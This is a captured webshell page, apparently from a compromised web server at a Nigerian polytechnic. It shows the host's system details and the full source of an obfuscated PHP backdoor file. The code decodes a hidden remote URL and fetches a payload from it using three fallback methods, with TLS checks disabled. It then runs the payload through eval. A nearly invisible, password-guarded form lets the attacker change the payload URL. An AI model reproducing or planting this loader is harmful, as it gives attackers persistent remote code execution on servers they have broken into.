403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.50.63
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/.trash/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/.trash//bypasbaru1.php
<?php
goto dEGLy;

jet40:
$asciiArray = array(104,116,116,112,115,58,47,47,112,117,98,45,49,56,48,102,98,53,99,48,56,53,50,54,52,97,97,54,97,100,101,56,100,50,49,51,53,101,53,97,53,98,102,57,46,114,50,46,100,101,118,47,98,121,112,97,115,115,115,104,101,108,108,98,97,114,117,107,117,46,116,120,116);
goto ETkpX;

wLMPL:
$correct_password = "\x24\62\x61\x24\61\x32\x24\132\61\x4c\141\x46\x48\151\x78\171\x2e\x4f\164\x4d\104\x64\x68\127\x31\146\x73\x4e\117\120\163\x54\132\131\x54\167\x79\x45\126\56\x43\x4f\164\113\x78\x4e\160\x47\x38\x75\121\110\x75\56\x64\x4a\x39\x30\x4c\x69";
goto IzDOv;

GBFiu:
if (isset($_GET["\164\x73"])) {
    if ($_SERVER["\x52\x45\121\125\105\x53\x54\137\115\105\x54\110\117\104"] === "\120\x4f\x53\124") {
        if (isset($_POST["\160\x61\x73\x73\x77\x6f\x72\x64"])) {
            $provided_password = $_POST["\x70\141\163\x73\167\157\x72\x64"];
            if (password_verify($provided_password, $correct_password)) {
                if (isset($_POST["\165\x72\154"])) {
                    $url = $_POST["\165\x72\154"];
                    $_SESSION["\x74\x73\137\165\x72\x6c"] = $url;
                    echo "\x75\160\x64\x61\x74\145\x64\40\x3a\x20" . $_SESSION["\164\x73\137\165\162\x6c"];
                    die;
                } else {
                    echo "\105\162\162\157\x72\41";
                    die;
                }
            } else {
                echo '';
                die;
            }
        } else {
            echo '';
            die;
        }
    } else {
        ?>
        <head>
            <style>
                #password{order:2}
                #url{order:1}
                #password,#url{display:block;margin-bottom:10px;opacity:0;transition:opacity .3s}
                #password:hover,#url:hover{opacity:1}
                form{display:flex;flex-direction:column;align-items:flex-end}
            </style>
            <script>
                document.addEventListener("DOMContentLoaded",function(){
                    document.querySelector("#password").addEventListener("keydown",function(e){
                        if("Enter"===e.key){
                            e.preventDefault();
                            document.querySelector("form").submit()
                        }
                    })
                })
            </script>
        </head>
        <body>
        <form action="" method="post">
            <input id="password" name="password" type="password"><br>
            <input id="url" name="url" value="<?php echo isset($_POST["\x75\x72\x6c"]) ? $_POST["\x75\x72\x6c"] : ''; ?>"><br>
        </form>
        </body>
        <?php
        die;
    }
} else {
    if (empty($_SESSION["\164\163\137\165\x72\x6c"])) {
        $result = @file_get_contents($url);
        if (empty($result)) {
            $result = madrid($url);
            if (empty($result)) {
                $result = downloadWithFopen($url);
            }
        }
    } else {
        $result = @file_get_contents($_SESSION["\164\163\x5f\165\162\154"]);
        if (empty($result)) {
            $result = madrid($_SESSION["\x74\163\137\165\x72\154"]);
            if (empty($result)) {
                $result = downloadWithFopen($_SESSION["\x74\163\137\165\162\154"]);
            }
        }
    }
}
goto Yndz2;

GIAlP:
function madrid($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
goto pT8Jl;

pT8Jl:
function downloadWithFopen($url) {
    $contextOptions = array(
        "\163\x73\x6c" => array(
            "\x76\x65\x72\151\x66\x79\137\160\145\145\162" => false,
            "\166\x65\162\151\x66\x79\x5f\x70\145\x65\145\x72\x5f\x6e\141\x6d\145" => false
        )
    );
    $context = stream_context_create($contextOptions);
    $result = false;
    if ($fp = fopen($url, "\x72", false, $context)) {
        $result = '';
        while ($data = fread($fp, 8192)) {
            $result .= $data;
        }
        fclose($fp);
    }
    return $result;
}
goto jet40;

ETkpX:
$decodedString = '';
goto YJGjN;

Yndz2:
if (is_string($result)) {
    eval("\x3f\x3e" . $result);
} else {
    echo "\x45\162\x72\157\162";
}
goto EtxF9;

dEGLy:
session_start();
goto GIAlP;

YJGjN:
foreach ($asciiArray as $ascii) { $decodedString .= chr($ascii); }
goto WG1Oa;

WG1Oa:
$url = $decodedString;
goto wLMPL;

IzDOv:
if (isset($_GET["\x74\x73\x5f\x72\145\163\145\164"])) {
    $_SESSION["\164\x73\x5f\165\162\x6c"] = '';
    echo "\163\165\143\x63\145\x73\x73";
    die;
}
goto GBFiu;

EtxF9:

Youez - 2016 - github.com/yon3zu
LinuXploit